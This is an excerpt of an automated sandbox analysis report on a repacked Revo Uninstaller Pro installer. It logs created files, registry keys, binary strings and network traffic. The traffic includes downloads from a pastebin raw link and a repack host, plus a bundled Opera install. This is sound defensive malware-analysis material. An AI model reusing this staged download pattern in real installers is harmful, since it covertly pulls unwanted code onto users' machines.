      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.bat
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldb
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.ini
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller Pro
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115408145.log
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20241209115410771.log
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt
      Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 194.87.189.43:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.4:49824 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 107.167.96.38:443 -> 192.168.2.4:49849 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 107.167.96.39:443 -> 192.168.2.4:49850 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 107.167.125.189:443 -> 192.168.2.4:49851 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 107.167.96.30:443 -> 192.168.2.4:49857 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 107.167.96.36:443 -> 192.168.2.4:49858 version: TLS 1.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PACK.EXE, 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp, PACK.EXE, 00000010.00000003.2196303250.0000000004E01000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2194996794.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000000.2193337281.0000000001002000.00000002.00000001.01000000.00000012.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000005140000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.00000000033A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: installer_lib.dll.pdb@ source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FDA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,16_2_00FDA2DF
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00FEAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,16_2_00FEAFB9
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_004069FF FindFirstFileW,FindClose,26_2_004069FF
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,26_2_00405DAE
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeCode function: 26_2_00402930 FindFirstFileW,26_2_00402930
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\

      Networking

      Source: unknownDNS query: name: pastebin.com
      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /raw/vkwZzU9B HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: pastebin.comConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /tsjtmfdm.pkg HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: mail.repack.meConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: net.geo.opera.comConnection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /me/ HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: autoupdate.opera.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /api/v2/features?country=US&language=en-GB&uuid=a6c287cc-47e5-4bf0-9dac-fbaf9040d09e&product=&channel=Stable&version=115.0.5322.77 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: features.opera-api2.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=cd9f81c6-729a-4d95-ac71-1ebba75bfc7b HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: download.opera.comCache-Control: no-cache
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: c. Facebook Messenger: A messaging service provided by Facebook, Inc., Meta Platforms Ireland Ltd. or related companies, depending on where you are accessing their services. Terms of use are available at https://www.facebook.com/legal/terms; and equals www.facebook.com (Facebook)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Googlehttps://www.bing.com/search?q=https://www.google.com/search?q=https://search.yahoo.com/search?p=Yahoohttps://duckduckgo.com/?q=DuckDuckGoSelectedEngineGeneral\WebSearchURL` equals www.yahoo.com (Yahoo)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MjViewTypeSort by column\RegBackup\Daily\\Steam\steam.exe--uninstall-app-id=Sort type64Microsoft .NETUpdate for Windows--profile-RedistMicrosoft Web DeployMicrosoft Visual C++Microsoft SQL ServerMicrosoft System CLRLast Full Backup/XOpenJDKURLInfoAbout /in "%s"\RevoAppBar.exe/I(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|ModifyPathI\data\cachedata.dat\data\OLDcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789\data\Prevcachedata.datOpen-ShellSOFTWARE\Microsoft\Installer\Products\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\ProductIconInstaller\Products\PotPlayerctor.dllSlowInfoCacheantamedia hotspotInstallDateSystemComponent\Installer\UserData\MsiExec.exe /X%02d.%02d.%dPublisherDisplayIconInstallLocationParentKeyName\InstallPropertiesHelpLinkCommentsSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\WindowsInstallerSOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\\Products\cachedata.datEstimatedSizeMsiExec.exe\data\' AND RDN LIKE '' AND RPVer LIKE '%d.%dSELECT * FROM ILogs WHERE RKey=' /i /x /I /XQuietUninstallString"%s" /S %s%s /quiet%s /qn\contrast-black\.scale-400%s /S_contrast-blackx 64x 86.targetsize-256UninstallSection%d64bit32bitx-64x-86(x64 edition)(x86 edition)64 bit32 bitMicrosoft Edge WebView2 Runtimex64 editionx86 edition equals www.facebook.com (Facebook)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: ViewType\RegBackup\Daily\\Steam\steam.exe64Sort typeSort by columnMicrosoft .NETRedist--profile---uninstall-app-id=Microsoft Web DeployMicrosoft System CLRMicrosoft SQL ServerUpdate for WindowsLast Full BackupURLInfoAboutOpenJDKMicrosoft Visual C++ /in "%s"(*.exe;*.com;*.msi)|*.exe;*.com;*.msi|(*.*)|*.*|/I/XModifyPath\data\OLDcachedata.dat\data\cachedata.dat\RevoAppBar.exe\data\Prevcachedata.dathttps://www.facebook.com/pages/Revo-Uninstaller/53526911789I equals www.facebook.com (Facebook)
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://www.bing.com/search?q=YahooGooglehttps://www.google.com/search?q=https://duckduckgo.com/?q=General\WebSearchhttps://search.yahoo.com/search?p=DuckDuckGoSelectedEngineURL` equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: pastebin.com
      Source: global trafficDNS traffic detected: DNS query: mail.repack.me
      Source: global trafficDNS traffic detected: DNS query: net.geo.opera.com
      Source: global trafficDNS traffic detected: DNS query: autoupdate.geo.opera.com
      Source: global trafficDNS traffic detected: DNS query: desktop-netinstaller-sub.osp.opera.software
      Source: global trafficDNS traffic detected: DNS query: autoupdate.opera.com
      Source: global trafficDNS traffic detected: DNS query: features.opera-api2.com
      Source: global trafficDNS traffic detected: DNS query: download.opera.com
      Source: global trafficDNS traffic detected: DNS query: download3.operacdn.com
      Source: unknownHTTP traffic detected: POST /v5/netinstaller/opera/Stable/windows/x64 HTTP/1.1User-Agent: Opera NetInstaller/115.0.5322.77Host: autoupdate.geo.opera.comContent-Length: 656Cache-Control: no-cache
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.0000000140887000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.0000000140887000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http:////file:////www.web.OS
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://autoupdate-staging.services.ams.osa/netinstallervwindows?&One
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
